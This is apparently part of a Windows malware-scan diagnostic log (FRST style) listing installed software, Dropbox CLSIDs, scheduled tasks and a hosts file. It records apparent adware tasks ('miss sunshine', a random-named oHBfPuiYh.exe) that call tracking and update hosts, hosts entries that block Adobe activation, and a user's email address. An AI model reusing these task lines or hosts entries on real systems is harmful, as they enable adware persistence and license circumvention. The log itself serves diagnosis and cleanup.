Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3355 - Intel Corporation)
Intel® PROSet/Wireless Software for Bluetooth® Technology(patch version 3.0.1342.2) (HKLM\...\{302600C1-6BDF-4FD1-1311-148929CC1385}) (Version: 3.1.1311.0402 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.5.0.1066 - Intel Corporation)
Intel® SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 3.0.0.63463 - Intel Corporation)
Intel® PROSet/Wireless Software (HKLM-x32\...\{105fa5c4-72e1-41f2-a82c-884d8aa4b381}) (Version: 16.6.0 - Intel Corporation)
Java 7 Update 71 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217045FF}) (Version: 7.0.710 - Oracle)
Juniper Networks Setup Client (HKU\S-1-5-21-2601788436-2821952545-4294816460-1002\...\Juniper_Setup_Client) (Version: 8.0.6.48695 - Juniper Networks)
Juniper Networks Setup Client (HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Juniper_Setup_Client) (Version: 8.0.6.48695 - Juniper Networks)
Juniper Networks Setup Client 64-bit Activex Control (HKLM\...\Juniper_Setup_Client Activex Control) (Version: 2.1.1.1 - Juniper Networks)
Juniper Networks Setup Client Activex Control (HKLM-x32\...\Juniper_Setup_Client Activex Control) (Version: 2.1.1.1 - Juniper Networks)
Juniper Terminal Services Client (HKU\S-1-5-21-2601788436-2821952545-4294816460-1002\...\Juniper_Term_Services) (Version: 8.0.6.32195 - Juniper Networks)
Juniper Terminal Services Client (HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Juniper_Term_Services) (Version: 8.0.6.32195 - Juniper Networks)
Junos Pulse 5.0 (HKLM-x32\...\Junos Pulse 5.0) (Version: 5.0.48695 - Juniper Networks, Inc.)
Junos Pulse Core Components (x32 Version: 5.0.48695 - Juniper Networks) Hidden
Junos Pulse Drivers Add-On (Version: 5.0.48695 - Juniper Networks) Hidden
Junos Pulse Host Checker Plugin Add-On (x32 Version: 5.0.48695 - Juniper Networks) Hidden
Junos Pulse Tunnel Manager Add-On (x32 Version: 5.0.48695 - Juniper Networks) Hidden
Junos Pulse UAC/NC Components (x32 Version: 5.0.48695 - Juniper Networks) Hidden
LAME v3.99.3 (for Windows) (HKLM-x32\...\LAME_is1) (Version:  - )
Logitech Gaming Software 8.51 (HKLM\...\Logitech Gaming Software) (Version: 8.51.5 - Logitech Inc.)
Logitech SetPoint 6.65 (HKLM\...\sp6) (Version: 6.65.62 - Logitech)
Malwarebytes Anti-Malware version 2.1.4.1018 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.4.1018 - Malwarebytes Corporation)
Microsoft .NET Framework 1.1 (HKLM-x32\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version: 1.1.4322 - Microsoft)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Office 2003 Web Components (HKLM-x32\...\{90120000-00A4-0409-0000-0000000FF1CE}) (Version: 12.0.6213.1000 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office Home and Student 2007 (HKLM-x32\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.31211.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Preview Redistributable (x64) - 12.0.20617 (HKLM-x32\...\{448652c1-f5f3-4230-98c6-68c10c88b1fb}) (Version: 12.0.20617.1 - Microsoft Corporation)
Microsoft Visual Studio 2005 Remote Debugger Light (x64) - ENU (HKLM\...\Microsoft Visual Studio 2005 Remote Debugger Light (x64) - ENU) (Version:  - Microsoft Corporation)
MonInfo 2.7 (HKLM-x32\...\{AD0BBBFD-C5E9-4214-A863-E83313D67C0C}_is1) (Version: 2.60.0.973 - EnTech Taiwan)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 36.0.4 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 36.0.4 (x86 en-US)) (Version: 36.0.4 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla)
Mp3tag v2.60 (HKLM-x32\...\Mp3tag) (Version: v2.60 - Florian Heidenreich)
MPC-HC 1.7.3 (64-bit) (HKLM\...\{2ACBF1FA-F5C3-4B19-A774-B22A31F231B9}_is1) (Version: 1.7.3 - MPC-HC Team)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
NVIDIA 3D Vision Driver 347.88 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 347.88 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.4.1.21 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.4.1.21 - NVIDIA Corporation)
NVIDIA Graphics Driver 347.88 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 347.88 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.33.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.33.0 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.14.0702 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.14.0702 - NVIDIA Corporation)
Origin (HKLM-x32\...\Origin) (Version: 9.3.11.2762 - Electronic Arts, Inc.)
paint.net (HKLM\...\{19BD2C33-16A8-4ED1-B9EA-D9E35B21EC42}) (Version: 4.0.5 - dotPDN LLC)
PDF Settings CS6 (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
ph (x32 Version: 1.0.0 - Your Company Name) Hidden
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.993 - Even Balance, Inc.)
Python 2.7.3 (HKLM-x32\...\{C0C31BCC-56FB-42A7-8766-D29E1BD74C7C}) (Version: 2.7.3150 - Python Software Foundation)
qBittorrent 3.1.4 (HKLM-x32\...\qbittorrent) (Version: 3.1.4 - The qBittorrent project)
Razer Synapse 2.0 (HKLM-x32\...\{0D78BEE2-F8FF-4498-AF1A-3FF81CED8AC6}) (Version: 1.18.02 - Razer Inc.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.2.9200.21239 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.20.815.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7101 - Realtek Semiconductor Corp.)
RivaTuner Statistics Server 5.2.0 (HKLM-x32\...\RTSS) (Version: 5.2.0 - Unwinder)
SHIELD Streaming (Version: 4.1.1000 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.4.1.21 - NVIDIA Corporation) Hidden
Smart Manager V3 Ver 3.6.1 (HKLM\...\Smart Manager V3) (Version: Ver 3.6.1 - GIGABYTE)
Smart Switch v1.4.7 (HKLM-x32\...\Smart Switch) (Version: v1.4.7 - GIGABYTE TECHNOLOGY CO.,LTD.)
Smart Technology Programming Software 7.0.27.13 (HKLM\...\{BD90BC1C-115D-47E1-B85C-07AE182C3AB8}) (Version: 7.0.27.13 - Mad Catz)
Smart Update v2.4.3 (HKLM-x32\...\Smart Update) (Version: v2.4.3 - GIGABYTE TECHNOLOGY CO.,LTD.)
Software Updater (HKLM-x32\...\{FA7EE274-7370-43B7-9A45-A39B17CCCDC5}) (Version: 4.3.3 - SEIKO EPSON CORPORATION)
SolidWorks 2014 x64 Edition SP0 (HKLM-x32\...\SolidWorks Installation Manager 20140-40000-1100-100) (Version: 22.0.0.5018 - SolidWorks Corporation)
SolidWorks 2014 x64 Edition SP0 (Version: 22.100.5018 - SolidWorks) Hidden
SolidWorks Composer Player 2014 SP0 x64 Edition (Version: 22.00.5018 - Dassault Systemes SolidWorks) Hidden
SolidWorks eDrawings 2014 x64 Edition SP0 (Version: 14.0.5006 - Dassault Systèmes SolidWorks Corp) Hidden
SolidWorks Explorer 2014 SP0 x64 Edition (Version: 22.00.5018 - SolidWorks Corporation) Hidden
SolidWorks Flow Simulation 2014 SP0 x64 Edition  (Version: 22.00.5019 - SolidWorks Corporation) Hidden
SolidWorks Plastics 2014 SP0 x64 Edition (Version: 22.00.5018 - SolidWorks Corporation) Hidden
SopCast 3.5.0 (HKLM-x32\...\SopCast) (Version: 3.5.0 - www.sopcast.com)
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
System Requirements Lab for Intel (HKLM-x32\...\{C7CA731B-BF9A-46D9-92CF-8A8737AE9240}) (Version: 4.5.13.0 - Husdawg, LLC)
TagScanner 5.1.649 (HKLM-x32\...\TagScanner_is1) (Version:  - Sergey Serkov)
Unity Web Player (HKU\S-1-5-21-2601788436-2821952545-4294816460-1002\...\UnityWebPlayer) (Version: 4.5.1f3 - Unity Technologies ApS)
Unity Web Player (HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\UnityWebPlayer) (Version: 4.5.1f3 - Unity Technologies ApS)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
VC8 CRT (Version: 8.0.50727.762 - Juniper Networks) Hidden
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.1.5 - VideoLAN)
WinDirStat 1.1.2 (HKU\S-1-5-21-2601788436-2821952545-4294816460-1002\...\WinDirStat) (Version:  - )
WinDirStat 1.1.2 (HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\WinDirStat) (Version:  - )
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
WinRAR 5.00 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.00.0 - win.rar GmbH)
Yadis! Backup 1.10.12 (HKLM-x32\...\Yadis_is1) (Version:  - Codessentials)
Zviewer version 2.0.0.9 (HKLM-x32\...\{1B00336F-393F-4DC7-9956-42C69ED6565E}_is1) (Version: 2.0.0.9 - )
影像中心 (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
照片库 (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)

==================== Restore Points  =========================

22-03-2015 00:07:30 Installed H&R Block California 2014.
30-03-2015 20:39:28 Scheduled Checkpoint
03-04-2015 21:58:40 Windows Update

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2014-12-17 03:53 - 2014-12-17 03:53 - 00001092 ___RA C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1 ood.opsource.net ereg.wip4.adobe.com ereg.wip.adobe.com activate-sjc0.adobe.com cmdls.adobe.com activate.wip4.adobe.com 3dns-1.adobe.com activate.wip1.adobe.com 3dns.adobe.com
127.0.0.1 practivate.adobe.ntp activate.wip.adobe.com wip1.adobe.com 3dns-4.adobe.com activate.wip2.adobe.com practivate.adobe prod-rel-ffc-ccm.oobesaas.adobe.com 3dns-2.adobe.com www.wip4.adobe.com
127.0.0.1 3dns-3.adobe.com crl.verisign.net adobe-dns-4.adobe.com adobe-dns-1.adobe.com adobe-dns.adobe.com ereg.adobe.com ereg.wip1.adobe.com wip4.adobe.com ereg.wip3.adobe.com
127.0.0.1 hl2rcv.adobe.com wip3.adobe.com na2m-pr.licenses.adobe.com wip2.adobe.com adobeereg.com lmlicenses.wip4.adobe.com www.wip2.adobe.com ereg.wip2.adobe.com adobe-dns-2.adobe.com
127.0.0.1 www.wip.adobe.com activate.adobe.com activate.wip3.adobe.com www.adobeereg.com adobe-dns-3.adobe.com www.wip1.adobe.com practivate.adobe.com activate-sea.adobe.com wip.adobe.com
127.0.0.1 na1r.services.adobe.com practivate.adobe.newoa www.wip3.adobe.com practivate.adobe.ipp wwis-dubc1-vip60.adobe.com lm.licenses.adobe.com

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {00BF31EA-102A-4258-BA75-53DAC60B49A0} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-11-02] (Google Inc.)
Task: {01D47F59-E89E-4B5A-B74C-720501F61AE7} - System32\Tasks\Microsoft\Windows\Setup\gwx\launchtrayprocess => C:\Windows\system32\GWX\GWX.exe [2015-03-23] (Microsoft Corporation)
Task: {03470BE6-EE8C-4554-A1A2-0B08E526B04D} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d => C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\Bootstrap.exe [2013-03-07] (Intel Corporation)
Task: {0B459F7E-DF2C-445B-ACA5-1D820F30FA36} - System32\Tasks\Dolby Selector => C:\Program Files (x86)\Dolby Home Theater v4\pcee4.exe [2012-08-31] (Dolby Laboratories Inc.)
Task: {0DA714EA-B915-4BEB-85EB-D189B08DCB06} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-11-02] (Google Inc.)
Task: {17A02B50-2ACC-4619-879F-CAD3CA0637E6} - System32\Tasks\oHBfPuiYh => C:\Users\User\AppData\Roaming\oHBfPuiYh.exe
Task: {27552F45-55D4-4889-895C-0D5FEB74FCA5} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-02-06] (Adobe Systems Incorporated)
Task: {3370CFF3-8E17-44A9-BE5C-D6A9F69E3B95} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2015-03-10] (Microsoft Corporation)
Task: {A08AD4AB-C3CC-4AA3-A1DE-6E88C9036847} - System32\Tasks\miss_sunshine_notification_service => C:\Program Files (x86)\miss sunshine\miss_sunshine_notification_service.exe
Task: {B492C228-9821-4206-9375-CB872E57B430} - System32\Tasks\miss_sunshine_updating_service => C:\Program Files (x86)\miss sunshine\miss_sunshine_updating_service.exe
Task: {B948AC6B-5535-404F-BA63-5F036F88339A} - System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-manhinlee@gmail.com => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2012-09-19] (Adobe Systems Incorporated)
Task: {C60E19B3-8E6D-4096-94ED-188021F935BD} - System32\Tasks\Microsoft\Windows\Setup\gwx\refreshgwxcontent => C:\Windows\system32\GWX\GWXConfigManager.exe [2015-03-23] (Microsoft Corporation)
Task: {D2841400-614D-4AB5-958A-730058AE89CA} - System32\Tasks\Microsoft\Windows\Setup\gwx\refreshgwxconfig => C:\Windows\system32\GWX\GWXConfigManager.exe [2015-03-23] (Microsoft Corporation)
Task: {DA291223-E838-48C8-A7A2-3A3A7DA4FA52} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon => C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\Bootstrap.exe [2013-03-07] (Intel Corporation)
Task: {FE412556-000D-450E-A35C-94DBB763C949} - System32\Tasks\Microsoft\Windows\Setup\gwx\runappraiser => C:\Windows\system32\GWX\GWXConfigManager.exe [2015-03-23] (Microsoft Corporation)
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\miss_sunshine_notification_service.job => C:\Program Files (x86)\miss sunshine\miss_sunshine_notification_service.exeé/url='http:/cdn.selectbestopt.com/notf_sys/index.html' /crregname='miss sunshine' /appid='73143' /srcid='2913' /bic='8ba9e3ea18d9ab8d382924758032ff5d' /verifier='c70975eaec473c280c707979692583c8' /installerversion='1.50.3.10' /statsdomain='http:/stats.buildomserv.com/data.gif?' /errorsdomain='http:/stats.buildomserv.com/data.gif?' /monetizationdomain='http:/logs.buildomserv.com/monetization.gif?' /installationtime='1428376683' /runfrom='task' /brwtype='notbg' /postponedhours='6'.GIG
Task: C:\WINDOWS\Tasks\miss_sunshine_updating_service.job => C:\Program Files (x86)\miss sunshine\miss_sunshine_updating_service.exe® /campid=2913 /verid=1 /url=http:/cdn.buildomserv.com/txt/@CAMPID@/@VER@/file.txt /appid=73143 /taskname=miss_sunshine_updating_service /funurl=http:/stats.buildomserv.com
Task: C:\WINDOWS\Tasks\oHBfPuiYh.job => C:\Users\User\AppData\Roaming\oHBfPuiYh.exe

==================== Loaded Modules (whitelisted) ==============

2013-12-02 19:28 - 2015-03-13 12:41 - 00011920 _____ () C:\Program Files\NVIDIA Corporation\CoProcManager\detoured.dll
2013-12-02 19:30 - 2015-03-13 09:16 - 00118472 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2014-01-06 05:01 - 2014-01-06 05:01 - 00019456 _____ () C:\Program Files\GIGABYTE\SmartManagerV3\ElevateService.exe
2013-12-05 00:47 - 2014-12-03 22:45 - 00076152 _____ () C:\WINDOWS\system32\PnkBstrA.exe
2013-11-16 01:08 - 2005-04-21 21:36 - 00143360 _____ () C:\WINDOWS\system32\BrSNMP64.dll
2014-01-06 05:01 - 2014-01-06 05:01 - 00009728 _____ () C:\Program Files\GIGABYTE\SmartManagerV3\OSD\IsMetroUI.dll
2014-01-06 05:02 - 2014-01-06 05:02 - 00409088 _____ () C:\Program Files\GIGABYTE\SmartManagerV3\OSD\Skin\OSD_Skin.dll
2014-01-06 05:01 - 2014-01-06 05:01 - 00198144 _____ () C:\Program Files\GIGABYTE\SmartManagerV3\GetDispDevs.dll
2014-01-06 05:01 - 2014-01-06 05:01 - 00094720 _____ () C:\Program Files\GIGABYTE\SmartManagerV3\PCIeCtl.dll
2013-10-16 04:42 - 2015-06-29 03:07 - 03673600 _____ () C:\Program Files\GIGABYTE\SmartManagerV3\Skin\Main_Skin.dll
2014-12-31 11:11 - 2014-12-21 23:21 - 01572776 _____ () C:\Program Files (x86)\Innovative Solutions\Advanced Uninstaller PRO\checker.exe
2015-03-30 23:30 - 2015-03-27 20:45 - 00011920 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2015-03-21 22:18 - 2015-03-04 15:08 - 00750080 _____ () C:\Users\User\AppData\Roaming\Dropbox\bin\libGLESv2.dll
2015-04-06 22:09 - 2015-04-06 22:09 - 00043008 _____ () c:\users\user\appdata\local\temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpoqom_e.dll
2015-03-21 22:18 - 2015-03-04 15:08 - 00047616 _____ () C:\Users\User\AppData\Roaming\Dropbox\bin\libEGL.dll
2015-03-21 22:18 - 2015-03-04 15:08 - 00865280 _____ () C:\Users\User\AppData\Roaming\Dropbox\bin\plugins\platforms\qwindows.dll
2015-03-21 22:18 - 2015-03-04 15:07 - 00200704 _____ () C:\Users\User\AppData\Roaming\Dropbox\bin\plugins\imageformats\qjpeg.dll
